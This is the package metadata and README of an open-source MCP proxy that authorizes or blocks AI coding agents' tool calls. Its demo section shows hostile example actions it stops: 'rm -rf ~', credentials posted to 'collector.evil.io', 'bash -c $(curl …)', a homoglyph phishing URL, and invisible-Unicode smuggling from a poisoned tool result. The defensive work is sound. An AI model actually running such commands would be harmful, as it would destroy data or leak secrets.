Metadata-Version: 2.4
Name: doberman-core
Version: 0.11.0
Summary: Adaptive authorization layer for coding agents (open core)
Project-URL: Homepage, https://github.com/fu351/Doberman-Core
Project-URL: Repository, https://github.com/fu351/Doberman-Core
Project-URL: Issues, https://github.com/fu351/Doberman-Core/issues
Author: fu351
License-Expression: Apache-2.0
License-File: LICENSE
Keywords: agent-security,ai-agents,authorization,guardrails,llm,mcp,security
Classifier: Development Status :: 4 - Beta
Classifier: Intended Audience :: Developers
Classifier: Operating System :: OS Independent
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Classifier: Topic :: Security
Classifier: Topic :: Software Development :: Quality Assurance
Requires-Python: >=3.11
Requires-Dist: aiosqlite
Requires-Dist: mcp<2,>=1.27
Requires-Dist: pydantic>=2
Requires-Dist: pyotp
Requires-Dist: pyyaml
Requires-Dist: typer
Provides-Extra: dev
Requires-Dist: import-linter; extra == 'dev'
Requires-Dist: pytest; extra == 'dev'
Requires-Dist: pytest-asyncio; extra == 'dev'
Requires-Dist: pytest-cov; extra == 'dev'
Requires-Dist: ruff; extra == 'dev'
Description-Content-Type: text/markdown

<div align="center">

# 🐕 Doberman

**Adaptive Authorization & Runtime Guardrails for AI Coding Agents**

[![CI](https://github.com/fu351/Doberman-Core/actions/workflows/ci.yml/badge.svg)](https://github.com/fu351/Doberman-Core/actions/workflows/ci.yml)
[![License: Apache 2.0](https://img.shields.io/badge/License-Apache_2.0-blue.svg)](./LICENSE)
[![Python](https://img.shields.io/badge/python-3.11%2B-blue.svg)](https://www.python.org/downloads/)
[![Status](https://img.shields.io/badge/status-alpha-orange.svg)](#roadmap)

**Doberman is an open-source AI agent security layer that intercepts every tool call your AI agent makes and returns PASS / AUTH / BLOCK — before anything executes.**

</div>

> If it isn't on the execution path, it's advisory, not protective.

AI coding agents (Claude Code, Cursor, Codex, Copilot agents, and any **MCP-compatible agent**) can read files, run shell commands, and call external APIs autonomously. Doberman sits *between the agent and its tools* as a transparent **MCP proxy**, turning every action into an explicit, auditable authorization decision.

```
AI agent ──▶ Doberman (MCP proxy) ──▶ real MCP tool servers
                  │
                  └─ normalize → risk engine → PASS / AUTH / BLOCK
```
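
The flow in the diagram can be sketched in a few lines of Python. This is an illustration only, not Doberman's actual code: the `Action` shape, the `normalize` and `risk_engine` functions, and the two toy rules are all assumptions made for the example.

```python
from dataclasses import dataclass
from enum import Enum


class Verdict(Enum):
    PASS = "PASS"
    AUTH = "AUTH"
    BLOCK = "BLOCK"


@dataclass(frozen=True)
class Action:
    """Normalized form of one tool call (hypothetical shape)."""
    tool: str
    target: str


def normalize(tool_name: str, arguments: dict) -> Action:
    # Collapse differently named arguments into one canonical target string.
    target = arguments.get("command") or arguments.get("path") or arguments.get("url") or ""
    return Action(tool=tool_name.strip().lower(), target=str(target).strip())


def risk_engine(action: Action) -> Verdict:
    # Toy rules standing in for the real engine.
    if action.target.startswith("rm -rf"):
        return Verdict.BLOCK
    if "/auth/" in action.target:
        return Verdict.AUTH
    return Verdict.PASS


def decide(tool_name: str, arguments: dict) -> Verdict:
    # normalize -> risk engine -> verdict, as in the diagram.
    return risk_engine(normalize(tool_name, arguments))
```

Normalizing first means the rules see one canonical shape regardless of how each tool names its arguments.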

---

## Why Doberman?

Prompt injection, tool poisoning, data exfiltration, and runaway agents are the defining security problems of agentic AI. Most "AI guardrails" inspect prompts and offer advice. Doberman is different: it is **on the tool-execution path**, so a blocked action *never runs*.

**Two non-negotiable properties:**

- 🔒 **Fail closed** — any error, uncertainty, or unhandled case denies the action. There is no path to a tool around the decision engine.
- 📈 **Raise-only learning** — guardrails and adaptive learning can auto-*tighten*, never silently loosen. Every weakening requires explicit, 2FA-gated, audited human approval.
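
Both properties are easy to state in code. The sketch below is hypothetical (the names `fail_closed` and `raise_only` are not taken from Doberman's source) and assumes verdicts can be ordered by strictness.

```python
from enum import IntEnum


class Verdict(IntEnum):
    # Ordered by strictness so that "tighter" means "larger".
    PASS = 0
    AUTH = 1
    BLOCK = 2


def fail_closed(engine, action) -> Verdict:
    """Run a decision function; any error or unexpected result denies."""
    try:
        result = engine(action)
    except Exception:
        return Verdict.BLOCK
    # Anything that is not a proper Verdict counts as an unhandled case.
    return result if isinstance(result, Verdict) else Verdict.BLOCK


def raise_only(current: Verdict, learned: Verdict) -> Verdict:
    """Automatic updates may tighten a verdict but never loosen it."""
    return max(current, learned)
```

In this sketch, loosening a verdict would have to go through a separate, human-approved path; `raise_only` deliberately offers no way to do it.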

---

## See it in action

Three verdicts. One execution gate.

### 🔴 BLOCK — dangerous actions stopped before they reach the tool

```
# Your agent cleans up build artefacts and misjudges the target…
agent  →  run_terminal_cmd  "rm -rf ~"
Doberman: BLOCK  destructive_command
          "Recursive force-delete of a home/root target."
# The command never reaches the shell.
```
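
To give a feel for what a deterministic `destructive_command` check might involve, here is a minimal sketch. It is not Doberman's rule: the target list and the function name are assumptions, and it ignores `sudo`, chained commands, and shell expansion, which a real check would have to handle.

```python
import shlex

# Hypothetical set of targets treated as "home or root".
DANGEROUS_TARGETS = {"/", "/*", "~", "~/", "$HOME"}


def is_recursive_force_delete(command: str) -> bool:
    try:
        tokens = shlex.split(command)
    except ValueError:
        # Unparseable input is treated as dangerous (fail closed).
        return True
    if not tokens or tokens[0] != "rm":
        return False
    args = tokens[1:]
    # Short flags may be combined, e.g. "-rf" or "-fr".
    short = "".join(t[1:] for t in args if t.startswith("-") and not t.startswith("--"))
    long_flags = {t for t in args if t.startswith("--")}
    recursive = "r" in short or "R" in short or "--recursive" in long_flags
    force = "f" in short or "--force" in long_flags
    targets = [t for t in args if not t.startswith("-")]
    return recursive and force and any(t in DANGEROUS_TARGETS for t in targets)
```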

```
# Your agent fetches a config token, then tries to phone it home…
agent  →  web_fetch  "https://collector.evil.io"  body="AWS_SECRET=AKIA..."
Doberman: BLOCK  secret_exfiltration
          "Credential pattern in request body to untrusted external destination."
# The request never leaves your machine. The secret is never echoed back to the agent.
```
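
A check of this kind combines two signals: a credential-shaped string in the payload and a destination outside an allowlist. The sketch below is an assumption-laden illustration, not Doberman's detector; the `TRUSTED_HOSTS` set and the two patterns are placeholders.

```python
import re
from urllib.parse import urlsplit

TRUSTED_HOSTS = {"api.github.com"}  # hypothetical allowlist

CREDENTIAL_PATTERNS = [
    re.compile(r"\bAKIA[0-9A-Z]{16}\b"),  # shape of an AWS access key ID
    re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
]


def is_secret_exfiltration(url: str, body: str) -> bool:
    host = (urlsplit(url).hostname or "").lower()
    untrusted = host not in TRUSTED_HOSTS
    has_secret = any(p.search(body) for p in CREDENTIAL_PATTERNS)
    # Only the boolean leaves this function; the matched secret is never returned.
    return untrusted and has_secret
```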

```
# Your agent rewrites shared branch history…
agent  →  run_terminal_cmd  "git push --force origin main"
Doberman: BLOCK  force_push_protected_branch
          "Force-push rewrites shared history on a protected branch."
```

```
# A poisoned tool result hides instructions in invisible Unicode, bound for an external API…
agent  →  http_post  "https://api.notes.app/sync"  body="<zero-width / tag-block smuggled text>"
Doberman: BLOCK  smuggled_token_channel
          "Hidden/invisible token-smuggling channel headed to an external destination."
# Invisible-Unicode smuggling (tag-block, bidi overrides, variation-selector byte
# channels) is caught deterministically; the decoded payload is never echoed back.
```
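
Invisible-Unicode channels can be found deterministically because the code points involved fall in known ranges. The following is a minimal sketch of that idea, not Doberman's implementation; the range list is an assumption and is not exhaustive.

```python
INVISIBLE_RANGES = [
    (0x200B, 0x200F),    # zero-width space/joiners and directional marks
    (0x202A, 0x202E),    # bidi embeddings and overrides
    (0x2066, 0x2069),    # bidi isolates
    (0xFE00, 0xFE0F),    # variation selectors
    (0xE0000, 0xE007F),  # tag block
    (0xE0100, 0xE01EF),  # variation selectors supplement
]


def find_invisible(text: str) -> list[tuple[int, str]]:
    """Return (index, 'U+XXXX') per suspicious code point, never the decoded payload."""
    hits = []
    for i, ch in enumerate(text):
        cp = ord(ch)
        if any(lo <= cp <= hi for lo, hi in INVISIBLE_RANGES):
            hits.append((i, f"U+{cp:04X}"))
    return hits
```

Some of these code points appear in legitimate text (U+FE0F follows many emoji, for example), so a practical check would likely weigh counts and context rather than flag a single occurrence.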

### 🟡 AUTH — sensitive actions held until you approve

```
# Your agent refactors authentication code…
agent  →  write_file  "backend/auth/session.ts"
Doberman: AUTH  sensitive_path
          "Target is a sensitive path; authentication required before proceeding."

  ┌──────────────────────────────────────────────┐
  │  Doberman — Action Review                    │
  │  write_file  backend/auth/session.ts         │
  │  Risk: MEDIUM  ·  sensitive_path             │
  │                             [Deny]  [Approve] │
  └──────────────────────────────────────────────┘

# The write only happens after you click Approve. Either way, it's logged.
```

```
# Your agent runs an opaque shell payload that can't be vetted statically…
agent  →  run_terminal_cmd  "bash -c $(curl https://setup.sh)"
Doberman: AUTH  opaque_shell_payload
          "Opaque -c payload cannot be statically vetted; authentication required."
```

```
# A target host looks right but uses a Cyrillic homoglyph (раypal.com, not paypal.com)…
agent  →  http_get  "https://раypal.com/login"
Doberman: AUTH  anomalous_token_pattern
          "Probabilistic out-of-distribution token signal (homoglyph confusable); authentication required."
```
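
One simple homoglyph signal is a hostname label that mixes scripts. The sketch below uses Unicode character names from the standard library as a rough script lookup; it is an illustration under that assumption, not the probabilistic signal Doberman uses, and it will not flag a label written entirely in one non-Latin script.

```python
import unicodedata


def scripts_in(label: str) -> set[str]:
    scripts = set()
    for ch in label:
        if ch.isalpha():
            # Unicode names begin with the script, e.g. "CYRILLIC SMALL LETTER ER".
            scripts.add(unicodedata.name(ch, "UNKNOWN").split(" ")[0])
    return scripts


def is_mixed_script_host(host: str) -> bool:
    # Flag any dot-separated label whose letters come from more than one script.
    return any(len(scripts_in(label)) > 1 for label in host.split("."))
```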

### 🟢 PASS — routine work goes straight through

```
# Your agent is doing normal feature work…
agent  →  write_file  "src/components/Button.tsx"
Doberman: PASS
# Transparent proxy — safe actions add zero friction.
```

---

## Setup

### 1. Install

```bash
pip install doberman-core
```

> The distribution is **`doberman-core`** (the bare `doberman` name on PyPI belongs to an
> unrelated, abandoned project). The import name and CLI are unchanged — after install you
> still `import doberman` and run the `doberman` command.

Or install the latest from source:

```bash
pip install git+https://github.com/fu351/Doberman-Core.git
```

Or for development:

```bash
git clone https://github.com/fu351/Doberman-Core.git
cd Doberman-Core
pip install -e ".[dev]"
```

Whichever route you choose, you get the `doberman` CLI on your PATH. (Maintainers: see [`RELEASING.md`](RELEASING.md).)

### 2. Wrap your tool server with Doberman

Doberman is a transparent MCP proxy. Pass your existing tool server command after `--`, and Doberman intercepts every tool call between the agent and that server:

```bash
# Before — agent talks directly to your tool server:
npx -y @modelcontextprotocol/server-filesystem ~/my-project

# After — wrap it with Doberman:
doberman serve -- npx -y @modelcontextprotocol/server-filesystem ~/my-project
#             ^^  the -- separator: everything after is your existing tool server command
```

To specify which repo's policy governs decisions (defaults to the current directory):

```bash
doberman serve --path ~/my-project -- npx -y @modelcontextprotocol/server-filesystem ~/my-project
```

Doberman communicates over **stdio** — it spawns your tool server as a managed subprocess and speaks standard MCP. Your agent sees one server entry; the real tool server runs silently behind it.
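
The `--` convention is straightforward to picture in code. This sketch shows one way a CLI could split its own options from the downstream command; the function name is hypothetical and this is not how Doberman necessarily parses its arguments.

```python
def split_at_separator(argv: list[str]) -> tuple[list[str], list[str]]:
    """Split argv into (own options, downstream command) at the first '--'."""
    if "--" not in argv:
        raise ValueError("missing '--' separator before the tool server command")
    i = argv.index("--")
    own, downstream = argv[:i], argv[i + 1:]
    if not downstream:
        raise ValueError("no tool server command given after '--'")
    return own, downstream
```

Splitting at the first `--` leaves any later `--` inside the downstream command untouched, so a wrapped server can still use the separator for its own purposes.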

### 3. Point your agent at Doberman

Replace your agent's existing MCP server entry with the Doberman-wrapped version.

**Claude Code (CLI):**
```bash
claude mcp add doberman -- doberman serve -- npx -y @modelcontextprotocol/server-filesystem ~/my-project
```

**Claude Desktop** (`~/Library/Application Support/Claude/claude_desktop_config.json` on macOS,
`%APPDATA%\Claude\claude_desktop_config.json` on Windows):
```json
{
  "mcpServers": {
    "doberman": {
      "command": "doberman",
      "args": ["serve", "--",
               "npx", "-y", "@modelcontextprotocol/server-filesystem", "~/my-project"]
    }
  }
}
```

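**Cursor, Codex, or any MCP-compatible client:** register the same `command` and `args` in your client's MCP config file, substituting your own tool server command after `--`. The file location and format vary by client, so check your client's documentation for the exact keys.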
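
If you maintain several configs, the Claude Desktop entry shown above can be generated rather than hand-edited. The helper names below are hypothetical. Because a JSON config is not processed by a shell, this sketch expands `~` up front as a defensive choice, although some tool servers expand it themselves.

```python
import json
from pathlib import Path


def doberman_entry(downstream: list[str]) -> dict:
    """Wrap a downstream tool server command in a Doberman server entry."""
    return {"command": "doberman", "args": ["serve", "--", *downstream]}


def config_for(project_dir: str) -> str:
    # Resolve "~" here, since no shell will do it for a JSON config.
    project = str(Path(project_dir).expanduser())
    entry = doberman_entry(
        ["npx", "-y", "@modelcontextprotocol/server-filesystem", project]
    )
    return json.dumps({"mcpServers": {"doberman": entry}}, indent=2)


if __name__ == "__main__":
    print(config_for("~/my-project"))
```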

### 4. Scan (optional)

```bash
doberman scan   # discover local MCP capabilities and build a risk map
```

Scanning is optional: basic protection works out of the box. To match your risk tolerance, pick a strength mode (see "Tune to your risk tolerance" below).

---

## Verify it end-to-end (real downstream, no fakes)

Two ways to watch Doberman front a **real** MCP server — no in-process test doubles anywhere in the chain.

**Interactive demo — MCP Inspector + a real filesystem server:**

```bash
npx -y @modelcontextprotocol/inspector doberman serve -- npx -y @modelcontextprotocol/server-filesystem ~/my-project
```

Open the Inspector UI and call tools through Doberman: routine reads and writes PASS straight through to the real filesystem server; a destructive call comes back as a policy error and never executes.

**End-to-end test — in a dev checkout:**

```bash
pytest tests/integration/test_serve_end_to_end.py -q
```

This spawns `doberman serve` as a real subprocess fronting a real stdio tool server ([`tests/fixtures/stdio_tool_server.py`](tests/fixtures/stdio_tool_server.py)), connects to it with a real MCP client playing the agent, and asserts the deployable chain over actual stdio:

1. the downstream's tools are re-exposed through the proxy,
2. a PASS verdict reaches the tool (the downstream's call log records it), and
3. a BLOCK verdict (`rm -rf /`) never reaches it — the call log stays empty.

That last assertion is the **chokepoint property** the whole project hangs on.
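
The same property can be shown in miniature with a recording downstream. This is a toy model with hypothetical names (`RecordingTool`, `gate`, `toy_decide`), not the project's test code, but it has the same shape: a blocked call must leave the call log untouched.

```python
class PolicyError(Exception):
    """Raised when the gate refuses to forward a call."""


class RecordingTool:
    """Stand-in downstream that logs every call it actually executes."""

    def __init__(self):
        self.calls = []

    def run(self, command: str) -> str:
        self.calls.append(command)
        return "ok"


def toy_decide(command: str) -> str:
    # Toy rule standing in for the real decision engine.
    return "BLOCK" if command.startswith("rm -rf") else "PASS"


def gate(tool: RecordingTool, command: str, decide=toy_decide) -> str:
    verdict = decide(command)
    if verdict != "PASS":
        # The tool is never touched on this branch.
        raise PolicyError(verdict)
    return tool.run(command)
```

Because the only call to `tool.run` sits after the verdict check, an empty call log is direct evidence that the blocked command reached nothing.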

> **Note on the test fixtures:** the rest of the integration suite deliberately uses an *in-process* fake downstream ([`tests/fixtures/fake_tool_server.py`](tests/fixtures/fake_tool_server.py)) that records every call it executes — recording is how the tests prove a blocked action reached *nothing*. It is a test fixture, not the runtime. `doberman serve` always spawns and talks to the real server you give it after `--`.

---

## Benchmark it (ASR / FPR)

A suite-agnostic harness scores Doberman as a **filter over labeled actions** and reports **ASR** (attack success rate: the share of attacks that bypass the filter) and **FPR** (false positive rate: benign actions that are over-blocked or meet friction). It runs the real decision engine over each labeled tool call. Doberman is the filter, not the agent, so the gated path is deterministic and offline.

```bash
python -m tests.benchmarks.run --suite synthetic --profile both
```

It reports two profiles — `builtins_only` and `with_plugins` (built-ins plus any installed entry-point plugins) — and their uplift. A deterministic synthetic suite gates in CI; map external task suites (**AgentDojo**, AgentDyn, AgentSentry, …) onto core's types with a small adapter — see [`tests/benchmarks/README.md`](tests/benchmarks/README.md).

> Reports hold counts, verdicts, and reason codes only — never payload text. ASR is reported alongside a stricter `asr_strict` (where only a hard `BLOCK` counts as mitigation): honest measurement, not a single headline number.
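
To make the metrics concrete, here is one way they could be computed from labeled verdicts. The exact definitions are assumptions inferred from the description above: an attack counts as bypassing only if it gets `PASS` (or, for `asr_strict`, anything short of `BLOCK`), and any benign action that does not `PASS` counts toward FPR. The harness itself may define them differently.

```python
def score(results: list[tuple[str, str]]) -> dict[str, float]:
    """results: (label, verdict) pairs with label in {"attack", "benign"}."""
    attacks = [v for label, v in results if label == "attack"]
    benign = [v for label, v in results if label == "benign"]

    def rate(hits: int, total: int) -> float:
        return hits / total if total else 0.0

    return {
        # AUTH and BLOCK both count as mitigation.
        "asr": rate(sum(v == "PASS" for v in attacks), len(attacks)),
        # Only a hard BLOCK counts as mitigation.
        "asr_strict": rate(sum(v != "BLOCK" for v in attacks), len(attacks)),
        # Any friction on a benign action counts against the filter.
        "fpr": rate(sum(v != "PASS" for v in benign), len(benign)),
    }
```

Like the reports described above, the function consumes only labels and verdicts, never payload text.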

---

## Tune to your risk tolerance

Set a mode in `.doberman/policies.yaml` or via `doberman policy set-mode <mode>`:

| Mode | Best for | Bulk-delete threshold | Step-up for unknown destinations | Step-up for behavioral anomalies |
|---|---|---|---|---|
| **Light** | Exploratory / trusted environments | 100 files | Yes | No |
| **Balanced** *(default)* | Everyday coding agents | 25 files | Yes | Yes |
| **Strict** | Production repos, shared codebases | 10 files | Yes | Yes |
| **Paranoid** | Highly autonomous or security-critical agents | 3 files | Yes | Yes |

> Hard blocks (secret exfiltration, destructive commands, role-boundary violations, smuggled-token-channel exfiltration) are **identical in every mode**. The mode dial only affects where step-up authentication is required for ambiguous or high-risk actions.
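
The table can be read as a lookup from mode to thresholds. The sketch below encodes only the values shown above. It assumes that a delete at or above the threshold triggers step-up (`AUTH`) and that an unknown mode fails closed; neither detail is confirmed by this README, and the names are hypothetical.

```python
BULK_DELETE_THRESHOLD = {"light": 100, "balanced": 25, "strict": 10, "paranoid": 3}
ANOMALY_STEP_UP = {"light": False, "balanced": True, "strict": True, "paranoid": True}


def bulk_delete_verdict(mode: str, files_deleted: int) -> str:
    threshold = BULK_DELETE_THRESHOLD.get(mode.lower())
    if threshold is None:
        return "BLOCK"  # unknown mode: fail closed (assumption)
    # Assumption: reaching the threshold is enough to require step-up.
    return "AUTH" if files_deleted >= threshold else "PASS"
```

For example, deleting 30 files would pass in Light mode but require approval in Balanced mode under these assumptions.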

---

## Who is this for?

- **Developers running AI coding agents** who want autonomous agents without `rm -rf` roulette.
- **Security engineers** evaluating AI agent security, MCP security, LLM tool-use sandboxing, and zero-trust architectures for agentic AI.
- **Platform teams** deploying agent fleets who need policy enforcement, audit logs, and human-in-the-loop approval for destructive actions.

---

## Roadmap <a name="roadmap"></a>

- ✅ Tool mediation
- ✅ Decision engine
- ✅ Objective guardrail (paths, commands, destinations, secrets, **smuggled-token channels**)
- ✅ Subjective guardrail (adaptive behavioral baselines, **OOD/homoglyph token signals**)
- ✅ Roles & boundaries
- ✅ Capability discovery
- ✅ Tiered auth (confirm → TOTP → scoped elevation)
- ✅ Audit log
- ✅ Policy-drift & poisoning defense
- ✅ Universal subjective layer (SL1–SL9)
- ✅ Turn gate (pre-inference prompt-injection screening)
- ✅ Benchmark harness (suite-agnostic ASR/FPR over labeled actions; `builtins_only` vs `with_plugins`; deterministic synthetic gate; external-suite adapters via `tests/benchmarks/`)
- 📋 Cost observability (`CostEvent` meter + raise-only loop-anomaly detection)
- 📋 Enterprise platform: centralized control plane, dashboards, org policy, SSO/RBAC

---

## License

Apache-2.0. The core is genuinely standalone — no proprietary dependency, ever (CI-enforced).

---

<sub>AI agent security · MCP security · MCP proxy · MCP firewall · AI guardrails · agentic AI safety · prompt injection defense · tool poisoning defense · LLM tool-use authorization · human-in-the-loop AI · AI agent sandbox · runtime AI security · zero trust for AI agents · Claude Code security · autonomous agent governance · data exfiltration prevention · adaptive anomaly detection · open source AI security</sub>
